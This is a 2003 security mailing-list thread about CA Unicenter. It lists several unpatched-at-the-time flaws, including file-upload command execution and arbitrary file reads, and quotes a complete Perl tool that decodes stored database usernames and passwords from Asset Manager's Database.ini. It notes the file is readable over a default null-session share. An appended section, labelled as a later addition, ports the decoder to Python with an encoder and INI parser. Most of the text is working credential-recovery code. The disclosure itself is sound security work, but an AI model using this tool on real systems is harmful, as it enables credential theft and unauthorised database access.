Re: CA Unicenter Password Recovery Tool

From: Joao Gouveia (tharbad_at_kaotik.org)
Date: 06/04/03

  • Next message: Derek Soeder: "Internet Explorer Object Type Property Overflow"
    To: Tor Houghton <info@kufumo.com>
    Date: 04 Jun 2003 19:21:37 +0100
    

    Hello Tor, all

    While you're at it, you might want to take a look at this. I came
    across these vulnerabilities while doing a superficial review on
    CA's TNG Unicenter. Not sure if some of this may affect "Asset Manager"
    or not.

    <quote>

    #1. Remote command execution via file upload
    ( http://machine/scripts/file_upload.pl )

    #2. A helpdesk user with no special access rights can read any file on
    the system where the Service desk daemon has access ( by default
    Local/SYSTEM ). The pdmcgi.exe accepts "templates" as a parameter without
    further security check regarding what type of files can be used as
    "templates".

    #3. pdm_cgireport.exe allows creating and browsing any report without
    prior authentication.

    #4. A normal user, who is configured to see only his requests, is able to
    see all requests by manipulating pdmcgi.exe queries.
    </quote>

    AFAIK, all these issues have been fixed, but I have no clue if the fixes
    are public or not. You should contact CA if you feel you might be
    vulnerable.

    Best regards,

    Joao Gouveia
    ------------
    tharbad@kaotik.org

    On Wed, 2003-06-04 at 16:27, Tor Houghton wrote:
    > List,
    >
    > The following can also be found at:
    >
    > http://www.kufumo.com/releases/ca-passwordrecover.txt
    >
    > Thanks,
    >
    > Tor Houghton
    >
    > ;
    >
    > $Id: ca-passwordrecover.txt,v 1.3 2003/05/20 10:46:51 torh Exp $
    >
    > Computer Associates "Asset Manager" Password Recovery Tool
    >
    > (c) 2003 Tor Houghton (th at kufumo dot com)
    >
    >
    > ++Synopsis++
    >
    > The Computer Associates' Unicenter Asset Manager(TM) software uses a stored
    > secret in order to decrypt stored passwords. Attached to this text is a tool
    > to decrypt these passwords.
    >
    >
    > ++What++
    >
    > (http://www3.ca.com/Solutions/Collateral.asp?CID=33237&ID=194)
    >
    > Simply put, it is a data collector with extended privileges. It is comprised
    > of an "Engine" (and a database), one or more "Sectors", a "Console" and an
    > "Agent" for each device (Windows or UNIX) that is to be added to the asset
    > database (see fig 1).
    >
    >      [Console]                      +-------- [Agent]
    >          |                          |
    >          v                          v
    >      [Database] <-- [Engine] --> [Sector] <-- [Agent]
    >                         |
    >                         +-------> [Sector] <-- [Agent]
    >                                      ^
    >                                      |
    >                                      +-------- [Agent]
    >
    > (figure 1)
    >
    > The arrows do not depict data flow, but transaction flow. For example, the
    > Agents do get data from the Sector (and deliver data to it), but the Agent
    > initiates this transaction.
    >
    > The Engine issues jobs and collects results (both stored on the Sector) and
    > the Agent executes these.
    >
    > On the whole, this looks like a nice design; you could easily firewall the
    > Engine, Console and Database from the rest of the network, for example.
    > However, the Sector is (by default) a NULLSESSION share, writable by anyone.
    >
    > Anyway. This document is not about whether or not it is possible to compromise
    > any machine with an Agent on it through a Sector, but to release a password
    > recovery tool.
    >
    > Here it is.
    >
    > --
    >
    > #!/usr/bin/perl
    > $version='ca-dbpwrecover 1.2 2003/03/19';
    > ##
    > ## (c) th at kufumo.com 2003
    > ##
    > ## this version was based on AMO Unicenter 3.2
    > ##
    > ## thanks to emf at kufumo.com and ssw at kufumo.com for help with the
    > ## disassembly and helping to reverse the encoding algorithm! go daddy!
    > ##
    > ## can't find a suitable file?
    > ##
    > ## (a default installation has the file 'Database.ini' available via a
    > ## nullsession share ("amdomain$") on the machine running the console/
    > ## engine.)
    > ##
    > ##
    > $|=1;
    > ##
    >
    > $ironic_seed="NetCon"; ## we predict $ironic_seed will change
    >                        ## in the next version of CA AMO etc.
    >
    > $CRYPT="BP7xCtDQqA2EZWoFH6wSIJeMzdYLb9Vfm5uNO4cKRGT3kUX018apyghijlnrsv";
    > $CLEAR="ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz";
    >
    > use Getopt::Long;
    >
    > GetOptions("h",
    >            "u=s" => \$uname,
    >            "p=s" => \$pword,
    >            "f=s" => \$file);
    >
    > if($opt_h) {
    >     print <<EOM;
    > $version (c) 2003 th at kufumo.com
    > usage: ca-dbpwrecover [-h] [-u <username>] [-p <passwd>] [-f <file>]
    > -h : this
    > -p : password (if not using files)
    > -u : username (if not using files)
    > -f : filename (e.g. 'ca-dbpwrecover -f Database.ini')
    > EOM
    >     exit(1);
    > }
    >
    > if($file) {
    >     DecryptCAEncryption("","",$file);
    > } else {
    >     if($pword && $uname) {
    >         ## was a typo'd call to a nonexistent DecryptCADecryption()
    >         DecryptCAEncryption($pword,$uname,"");
    >         exit(0);
    >     } else {
    >         print "Not enough parameters. Try -h.\n";
    >         exit(1);
    >     }
    > }
    >
    > exit();
    >
    > sub DecryptCAEncryption {
    >     my($pword,$uname,$file)=@_;
    >
    >     my($u,$c,$oa,$ob,$offset);
    >
    >     my(@crypt)=split(//,$CRYPT);
    >
    >     if($file) {
    >         open(IN,$file) || die "error: failed to open $file: $!\n";
    >         while(<IN>) {
    >             if(/^UserName=\#(\S+)\s*$/) {$name=$1;}
    >             if(/^Password=\#(\S+)\s*$/) {$pass=$1;}
    >         }
    >         close(IN);
    >     }
    >
    >     $uname=$name if($name);
    >     $pword=$pass if($pass);
    >
    >     @pass=split(//,$pword);
    >     @user=split(//,$uname);
    >
    >     @nc=split(//,$ironic_seed);
    >
    >     print "Username: ";
    >
    >     $c=5;
    >     for($u=0;$u<@user;$u++) {
    >
    >         ## find occurrence of current char ($user[$u]) in cleartext
    >         ## keystring:
    >
    >         $_=$CLEAR;
    >
    >         while(m/$user[$u]/g) {
    >             $oa=pos;
    >         }
    >
    >         $oa++;
    >
    >         if($u<@nc) {
    >             $_=$CRYPT;
    >             while(m/$nc[$u]/g) {
    >                 $ob=pos;
    >             }
    >             $ob++;
    >             $oa=$oa+($ob*-1);
    >         } else {
    >             $oa=$oa-$u+$c;
    >             $c++;
    >         }
    >
    >         while($oa<0) {
    >             $oa=$oa+62;
    >         }
    >         while($oa>62) {
    >             $oa=$oa-62;
    >         }
    >
    >         $oa--;
    >
    >         push(@clear,$crypt[$oa-1-$u]);
    >
    >     }
    >
    >     foreach(@clear) {
    >         print $_;
    >     }
    >
    >     print "\n";
    >
    >     ## who said reuse of code is a good thing?
    >     ## i think i failed class here. heck, did you want the tool or not?
    >     ##
    >
    >     print "Password: ";
    >
    >     $c=@clear;
    >
    >     for($u=0;$u<@pass;$u++) {
    >
    >         ## find occurrence of current char ($pass[$u]) in cleartext
    >         ## keystring:
    >
    >         $_=$CLEAR;
    >
    >         while(m/$pass[$u]/g) {
    >             $oa=pos;
    >         }
    >         $oa++;
    >
    >         if($u<@clear) {
    >             $_=$CRYPT;
    >             while(m/$clear[$u]/g) {
    >                 $ob=pos;
    >             }
    >             $ob++;
    >             $oa=$oa+($ob*-1);
    >         } else {
    >             $oa=$oa-$u+$c-1;
    >             $c++;
    >         }
    >
    >         while($oa<0) {
    >             $oa=$oa+62;
    >         }
    >         while($oa>62) {
    >             $oa=$oa-62;
    >         }
    >
    >         $oa--;
    >
    >         push(@cpass,$crypt[$oa-1-$u]);
    >
    >     }
    >
    >     foreach(@cpass) {
    >         print $_;
    >     }
    >
    >     print "\n";
    >
    > }
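
Added example, not part of Tor's post or of CA's product: a Python port of the decoding rule the Perl tool above implements, collapsed to one modular formula, together with the inverse derived from it and a parser for the UserName=#/Password=# lines, to make the point that the scheme is a position-dependent substitution keyed only by a fixed constant and the username, i.e. reversible obfuscation rather than encryption. encode(), recover() and the sample INI lines are constructed here and were not checked against a real Database.ini.

```python
import re

# Alphabets and constant seed copied from the Perl tool above.
CRYPT = "BP7xCtDQqA2EZWoFH6wSIJeMzdYLb9Vfm5uNO4cKRGT3kUX018apyghijlnrsv"
CLEAR = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz"
SEED = "NetCon"   # the Perl's $ironic_seed
N = len(CRYPT)    # 62; CRYPT is a permutation of CLEAR

def decode(encoded, key):
    """Port of the Perl loop: for position u the shift is
    idx_clear(enc[u]) - idx_crypt(key[u]) while the key lasts, then
    idx_clear(enc[u]) + 1; output is CRYPT[(shift - 2 - u) mod 62], which is
    what the Perl's while(<0)/while(>62) loops plus negative index compute."""
    out = []
    for u, ch in enumerate(encoded):
        if ch not in CLEAR:
            raise ValueError(f"{ch!r} is not in the tool's alphabet")
        d = CLEAR.index(ch)
        d = d - CRYPT.index(key[u]) if u < len(key) else d + 1
        out.append(CRYPT[(d - 2 - u) % N])
    return "".join(out)

def encode(plain, key):
    """Inverse of decode(), derived here from the decoder (assumption: it
    matches the product's own encoder only as far as the Perl is right)."""
    out = []
    for u, ch in enumerate(plain):
        d = (CRYPT.index(ch) + 2 + u) % N           # undo the final index shift
        d = d + CRYPT.index(key[u]) if u < len(key) else d - 1
        out.append(CLEAR[d % N])
    return "".join(out)

def recover(ini_text):
    """Parse the UserName=#... / Password=#... lines the Perl looks for and
    return (username, password) in clear.  As in the Perl, the username is
    decoded under SEED and the password under the decoded username."""
    name = re.search(r"^UserName=#(\S+)\s*$", ini_text, re.M)
    pw = re.search(r"^Password=#(\S+)\s*$", ini_text, re.M)
    if not (name and pw):
        raise ValueError("no UserName=#/Password=# lines found")
    user = decode(name.group(1), SEED)
    return user, decode(pw.group(1), user)

if __name__ == "__main__":
    # Constructed sample (not a real Database.ini): encode, then recover.
    sample = "UserName=#%s\nPassword=#%s\n" % (encode("admin", SEED),
                                              encode("s3cret", "admin"))
    print(recover(sample))   # ('admin', 's3cret')
```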
